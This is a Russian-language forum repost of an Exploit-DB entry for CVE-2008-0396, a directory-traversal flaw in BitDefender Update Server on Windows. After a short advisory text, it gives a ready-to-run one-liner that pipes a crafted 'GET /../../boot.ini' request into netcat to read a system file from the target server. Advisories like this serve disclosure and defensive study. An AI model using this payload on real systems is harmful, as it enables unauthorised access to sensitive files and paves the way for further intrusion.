- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 31039
- Проверка EDB
-
- Пройдено
- Автор
- OLIVER KAROW
- Тип уязвимости
- REMOTE
- Платформа
- WINDOWS
- CVE
- cve-2008-0396
- Дата публикации
- 2008-01-19
Код:
source: https://www.securityfocus.com/bid/27358/info
BitDefender Update Server is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data.
Exploiting this issue allows an attacker to access potentially sensitive information that could aid in further attacks.
BitDefender Security for File Servers, BitDefender Enterprise Manger, and other BitDefender products that include the Update Server are vulnerable. This issue affects Update Server when running on Windows; Linux and UNIX variants may also be affected.
echo -e "GET /../../boot.ini HTTP/1.0\r\n\r\n" | nc <server> <port>- Источник
- www.exploit-db.com
